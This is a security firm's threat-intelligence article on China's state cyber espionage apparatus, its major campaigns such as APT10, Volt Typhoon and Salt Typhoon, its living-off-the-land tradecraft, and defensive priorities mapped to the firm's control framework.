China's Cyber Espionage Program
# China's Cyber Espionage Program China operates the largest and most strategically patient state-sponsored cyber espionage program in the world.
Continue your mission
# China's Cyber Espionage Program China operates the largest and most strategically patient state-sponsored cyber espionage program in the world.
# China's Cyber Espionage Program
China operates the largest and most strategically patient state-sponsored cyber espionage program in the world. Where Russia's cyber operations are often destructive and disruptive, China's are characterized by scale, stealth, and long-term strategic alignment with national economic and military objectives. Chinese state actors have stolen intellectual property from virtually every sector of the Western economy, pre-positioned for potential wartime sabotage of critical infrastructure, and maintained persistent access to government and defense networks for years before detection.
The scale is measured in terabytes per operation and trillions of dollars in cumulative economic damage. General Keith Alexander, former NSA Director and founding commander of U.S. Cyber Command, called Chinese cyber espionage "the greatest transfer of wealth in history." The assessment has not changed. The operations have only grown more sophisticated.
CDA's founder has published research on Chinese cyber strategy through the Irregular Warfare Initiative, a joint publication of Princeton University's Empirical Studies of Conflict Project and the Modern War Institute at West Point. That research, "Eroding Global Stability: The Cybersecurity Strategies of China, Russia, North Korea, and Iran," documents the collaborative and increasingly unified nature of adversarial state cyber operations. The analysis below builds on that foundation.
China's cyber apparatus operates through a combination of military units, intelligence agencies, state-affiliated civilian groups, and private companies operating under state direction.
The PLASSF was established in December 2015 as a dedicated force combining cyber, space, electronic warfare, and psychological operations capabilities under a single command. The PLASSF's Network Systems Department is responsible for cyber operations, consolidating capabilities that were previously distributed across multiple PLA departments.
Prior to the PLASSF's formation, the PLA's cyber operations were conducted by individual unit-level groups, the most famous being Unit 61398 (based in a 12-story building in Shanghai's Pudong district), which was the subject of Mandiant's landmark APT1 report in 2013 and a U.S. DOJ indictment in 2014. The PLASSF centralized and professionalized these operations.
The PLASSF's cyber mission is primarily military: intelligence collection on foreign military capabilities, pre-positioning in adversary critical infrastructure for potential wartime use, and supporting PLA operations in a Taiwan contingency scenario. The military mission is distinct from but complementary to the economic espionage mission conducted primarily by the MSS.
The MSS is China's primary civilian intelligence agency and the most prolific conductor of cyber espionage against Western commercial, industrial, and government targets. MSS operations are conducted both by MSS officers and by contracted hackers working for MSS regional bureaus (provincial state security departments).
The MSS conducts economic espionage at industrial scale. Targeted sectors include aerospace, semiconductor, pharmaceutical, biotechnology, telecommunications, energy, advanced manufacturing, and any technology sector aligned with China's strategic development priorities (as outlined in the "Made in China 2025" industrial policy, the Five-Year Plans, and the "Thousand Talents" program).
The 2018 DOJ indictment of MSS officers Zhu Hua and Zhang Shilong (associated with APT10/Cloud Hopper) documented a campaign that targeted managed service providers (MSPs) to gain access to the MSPs' clients, affecting companies in aerospace, defense, technology, and other sectors across 12 countries. The operational model (compromise the MSP, pivot to the MSP's clients) predated the Kaseya and SolarWinds supply chain attacks and demonstrated China's early understanding of supply chain attack vectors.
China's cyber ecosystem includes groups that operate at the intersection of state direction and private enterprise. APT41 (also tracked as Double Dragon, Winnti, Barium) is the most documented example: a group that conducts both state-sponsored espionage operations and financially motivated cybercrime, sometimes simultaneously. APT41 has been attributed to operations targeting healthcare, telecommunications, technology, gaming, and government sectors. Its dual mandate (state espionage + personal profit) reflects the blurred boundaries in China's cyber ecosystem.
Other groups operate as contractors or affiliates to MSS regional bureaus. The i-Soon leak (February 2024) exposed the operations of a Chinese cybersecurity company that contracted with MSS and PLA to conduct hacking operations against foreign governments, telecommunications companies, and dissidents. The leak revealed contract prices, target lists, and operational tools, providing unprecedented visibility into the commercial contractor model that supports Chinese state-sponsored operations.
China's cyber operations serve four strategic objectives that align directly with the Chinese Communist Party's national priorities:
The primary volume of Chinese cyber operations targets intellectual property: research and development data, trade secrets, manufacturing processes, business strategies, and technology designs. The objective is to accelerate Chinese industrial development by acquiring foreign intellectual property rather than developing it independently.
The FBI has stated that China-related economic espionage investigations constitute a majority of their counterintelligence caseload. The Commission on the Theft of American Intellectual Property estimated the annual cost of Chinese IP theft to the U.S. economy at $225 billion to $600 billion. Targeted sectors align with China's stated development priorities: semiconductor design, aircraft engine technology, pharmaceutical research, AI and quantum computing research, telecommunications infrastructure, and advanced materials.
The discovery of Volt Typhoon in May 2023 revealed a Chinese state-sponsored operation focused not on espionage but on pre-positioning within U.S. critical infrastructure. Volt Typhoon used living-off-the-land techniques (legitimate system tools, no custom malware) to maintain persistent access to infrastructure in telecommunications, energy, water, transportation, and other critical sectors.
The operational purpose was not data theft. It was preparation for potential future sabotage: maintaining the placement and access necessary to disrupt or destroy U.S. critical infrastructure during a future conflict (most likely a Taiwan contingency). CISA, NSA, and FBI issued a joint advisory describing Volt Typhoon's activities as pre-positioning for "disruptive or destructive cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict."
Salt Typhoon, disclosed in late 2024, targeted U.S. telecommunications providers, gaining access to call metadata, communications content, and lawful intercept systems used by law enforcement. The operation demonstrated both espionage capability (who is communicating with whom) and potential sabotage capability (access to communications infrastructure that could be disrupted during conflict).
The Typhoon operations represent an evolution in Chinese cyber strategy: from economic espionage (steal IP to advance Chinese industry) to strategic pre-positioning (prepare to disrupt adversary infrastructure during wartime). Both objectives are active simultaneously.
Chinese military cyber operations target foreign defense ministries, military contractors, and armed forces to collect intelligence on military capabilities, plans, and technologies. The 2015 OPM breach (attributed to Chinese state actors) compromised the security clearance records of approximately 21.5 million current and former U.S. government employees, providing a comprehensive database for identifying intelligence targets, recruiting assets, and conducting counter-intelligence operations.
Chinese operations against defense contractors have targeted the F-35 Joint Strike Fighter program, naval propulsion systems, missile defense systems, and autonomous vehicle technology. The stolen data has accelerated the development of Chinese military systems that bear striking resemblance to their Western counterparts.
China uses cyber capabilities extensively for domestic surveillance: monitoring the communications of Uyghurs, Tibetans, Hong Kong activists, Falun Gong practitioners, and any individual or group the CCP considers a threat to internal stability. This domestic cyber capability extends internationally: Chinese cyber actors have targeted diaspora communities, foreign journalists covering China, and human rights organizations monitoring Chinese human rights practices.
The domestic surveillance mission represents the Empire side of the Republic/Empire distinction that CDA's geopolitical content observes. Democratic nations build cyber defense to protect citizens. Authoritarian regimes weaponize cyber offense to surveil and repress citizens. China's Great Firewall, its mass surveillance infrastructure, and its targeting of dissidents abroad are the clearest examples of cyber capability used as a tool of domestic control.
Chinese cyber operations share several distinguishing characteristics that differentiate them from Russian, Iranian, and North Korean operations:
Chinese operations are designed for long-term persistence. Where Russian operations often announce themselves through destruction (NotPetya) or disruption (election interference), Chinese operations succeed by remaining undetected for months or years. The SolarWinds operation (conducted by Russia's SVR) was detected after approximately nine months. Chinese operations have been documented with dwell times exceeding two years.
The patience is strategic. China's espionage objectives require sustained access over time: monitoring ongoing R&D programs, tracking evolving business strategies, and continuously collecting intelligence that informs Chinese policy decisions. A single data theft operation produces a snapshot. Persistent access produces a continuous intelligence stream.
Volt Typhoon exemplifies a trend in Chinese operations toward living-off-the-land techniques: using legitimate system tools (PowerShell, WMI, cmd, netsh, certutil) rather than custom malware. Living-off-the-land operations are harder to detect because the tools being used are legitimate tools that every system administrator uses. The difference between an administrator running netsh to configure a network interface and an attacker running netsh to create a port forwarding rule is intent, not technique. Detection requires behavioral analytics that identify anomalous use of legitimate tools, not signature-based detection that matches known malware.
This operational approach directly challenges the traditional SOC model. An organization that relies on malware signatures and IOC matching to detect threats will miss Volt Typhoon-style operations entirely. Detecting Chinese living-off-the-land operations requires the behavioral analytics, threat hunting, and ATT&CK-based detection coverage that CDA's TID operations provide.
Chinese cyber espionage operations target every sector of the Western economy simultaneously. Unlike Russian operations (which tend to focus on geopolitical targets: government, defense, energy, elections) or North Korean operations (which focus on financial targets), Chinese operations have been attributed in aerospace, automotive, biotechnology, chemical, defense, education, energy, financial services, government, healthcare, IT, legal, manufacturing, media, mining, pharmaceutical, real estate, semiconductor, telecommunications, and transportation.
The breadth means that virtually every organization of any size in any industry is a potential target for Chinese economic espionage. The targeting follows China's published industrial priorities: if a technology appears in Made in China 2025 or the current Five-Year Plan, the corresponding Western industry sector is a target.
The i-Soon leak and other revelations have exposed a commercial contractor model where private Chinese cybersecurity companies compete for government contracts to conduct hacking operations. These contractors provide "hacking as a service" to MSS regional bureaus, bidding on targets, proposing operational approaches, and delivering results for defined fees.
This model provides the Chinese government with scale (many contractors operating simultaneously), deniability (operations are conducted by private companies, not government employees), and cost efficiency (contractors compete on price and capability). It also creates operational security challenges: the i-Soon leak occurred because a contractor's internal data was exposed, revealing client lists, prices, and techniques.
Chinese operations span four primary PDM domains:
DPS: Chinese economic espionage targets data: intellectual property, trade secrets, R&D data, personnel records (OPM breach). DPS controls (data classification, encryption, DLP) protect the data that Chinese actors seek. Customer-managed encryption keys preserve sovereignty against adversaries who may have access to cloud provider infrastructure through legal or extralegal mechanisms.
VSD: Chinese operations exploit supply chain vulnerabilities (APT10/Cloud Hopper MSP compromise), internet-facing services, and living-off-the-land entry vectors. Continuous attack surface management and rapid patching of edge network devices (Volt Typhoon's preferred targets) reduce the entry points.
IAT: Chinese operations involve extensive credential theft and lateral movement through identity infrastructure. The Volt Typhoon advisory specifically identifies credential access and Active Directory reconnaissance as key techniques. Phishing-resistant MFA, PAM, and zero trust architecture limit the effectiveness of stolen credentials.
TID: Chinese living-off-the-land operations are specifically designed to evade signature-based detection. Detecting them requires behavioral analytics, ATT&CK-based detection engineering, and proactive threat hunting targeted to Chinese TTPs. CDA's PDI methodology applies directly: threat intelligence about current Chinese targeting (from CISA advisories, threat intel feeds, and CDA's own analysis) informs the detection rules and hunting hypotheses that find Chinese operations in client environments.
Chinese cyber threats affect every organization in every sector. The targeting is not limited to government and defense. Any organization that produces, develops, or holds intellectual property aligned with China's industrial priorities is a target. Any organization that operates or supports critical infrastructure is a potential pre-positioning target.
Defense against Chinese threat actors requires three priorities that CDA's PDM addresses:
Detect the undetectable. Chinese living-off-the-land operations cannot be detected through signatures and IOC matching. Organizations must invest in behavioral analytics (TID-H01: Detection Engineering Program), threat hunting (TID-H03: Threat Hunting Program), and detection coverage mapped against ATT&CK techniques (TID-R02: Detection Coverage Assessment). The detection program must be tuned to the techniques that Chinese actors specifically use.
Protect the crown jewels. Chinese operations target specific data. Data classification (DPS-R02, DPS-B01) identifies the most valuable data. Encryption with customer-managed keys (DPS-B02) protects it even if the attacker achieves access. DLP (DPS-B03) detects and blocks exfiltration. The DPS controls determine whether a Chinese intrusion results in intelligence collection or a contained access event with no data loss.
Harden the edge. Volt Typhoon targets edge network devices (routers, VPN appliances, firewalls) with outdated firmware. Patching edge devices within 48 hours of critical vulnerability disclosure (VSD-B02), monitoring the external attack surface continuously (VSD-C01), and hardening cloud configurations (VSD-H02) reduce the entry points that Chinese pre-positioning operations exploit.
Word count: 2,498
CDA Theater missions that address topics covered in this article.
Written by Evan Morgan
Found an issue? Help improve this article.